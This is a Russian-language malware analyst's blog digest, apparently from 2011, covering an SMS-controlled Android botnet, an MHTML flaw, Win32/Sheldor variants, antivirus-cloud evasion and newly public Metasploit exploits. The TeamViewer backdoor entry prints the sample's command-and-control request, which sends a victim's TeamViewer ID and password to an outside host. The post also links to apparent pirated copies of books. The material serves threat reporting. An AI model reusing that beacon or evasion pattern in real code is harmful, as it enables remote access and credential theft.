Концепт мобильного ботнета управляемого по SMS

На конференции Shmoocon'2011 был представлен интересный подход к построению мобильного ботнета с возможностью управления через SMS на телефонах на базе Android.

Слайды презентации

Видео с демонстрацией работы:

Уязвимость в обработке MHTML протокола (CVE-2011-0096)

Около двух недель назад появилась интересная информация "Hacking with mhtml protocol handler". Как оказалось очередной 0-дей в обработке MHTML, на этот раз уязвимость кроется в обработке MIME-formatted запросов. При определенных условиях злоумышленник может внедрить js-код, который выполниться на клиентской стороне. Последствия могут быть разные, например похищение аутентификационных данных для популярных сервисов или банальный XSS. Работает уязвимость только на IE, но зато для всех версий и видне начиная с ХР и выше.

Win32/Sheldor - теперь малиновый ...

Недавно уже писал про семейство Win32/Sheldor и вот на днях граждане порадовали другой версией Win32/Sheldor.E (VT) с двумя интересными командами:

Атака на антивирусные облака

На днях у себя в блоге MS опубликовала заметку о китайском троянце, который использует техники противодействия облачным антивирусным технологиям. С точки зрения приманки для журналистов все сработало, ибо заявление достаточно интересное, но на самом деле сей троянец достаточно прост и никаких инноваций в себе не несет.

Итак, способы противодействия облакам:
- при установке в файлы добавляются блоки случайного разного размера содержащие случайные данные, видимо для того, чтобы хешики сбивать.

Эксплойт для MS10-073 таки попал на паблик

Сегодня на Metasploit появился эксплойт для повышения привилегий до SYSTEM, через эксплуатацию уязвимости в неправильной обработки keyboard layout (win32k.sys). MS10-073 известен тем, что применялся червем Stuxnet для повышения привилегий на системах Win2000/WinXP и уже много где достаточно подробно разобран (анализ от vupen).

В Canvas эксплойт для этой уязвимости попал примерно за месяц до выхода патча, но публичного эксплойта так никто и не сочинил. Возможно по причине того, что эксплойт не универсален и работает только на Win2000/WinXP. Появление этого эксплойта в Metasploit связано с PoC, который разработал Ruben Santamarta aka reversemode и положил на паблик на прошлой неделе.

А вот уязвимость с переполнением стека при обработке SystemDefaultEUDCFont (CVE-2010-4398) по прежнему не закрыта, а ведь прошло у больше двух месяцев.

Чтиво для вирусного аналитика

Как то я уже писал о книге Malware Analyst's Cookbook Если кому надо, то вот:
http://depositfiles.com/files/3tgmhz81h
А здесь все исходные тексты из книги: http://code.google.com/p/malwarecookbook

Еще недавно приобрел неплохую книжицу "A Guide to Kernel Exploitation: Attacking the Core", но в интернетах водится ее электронная версия:
http://depositfiles.com/files/a5v5r0xkh

TeamViewer, как компонент бэкдора

Тут на днях коллегам из Group-IB попался интересный сэмпл, конечно он не просто так им попался и посредством него увели кругленькую сумму :) Собственно интересен он только тем, что дропер устанавливает в систему TeamViewer предыдущей версии с одной модифицированной библиотекой, через которую и происходит общение с админкой.

GET /getinfo.php?id=414%20034%20883&pwd=6655&stat=1 HTTP/1.1

User-Agent: x3

Host: goeiuyi.net

Во всем остальном интересного там ничего нет и все более чем стандартно. Детектим мы его, как Win32/Sheldor.NAD (VT).

0-day для Graphics Rendering Engine

Интересный эксплойт появился на метасплойте в начале января для CVE-2010-3970. Началось все с двух товарищей Moti Joseph & Xu Hao, которые поведали миру о переполнении стека при отображении thumbnails файлов на конференции POC2010 в середине декабря (слайды).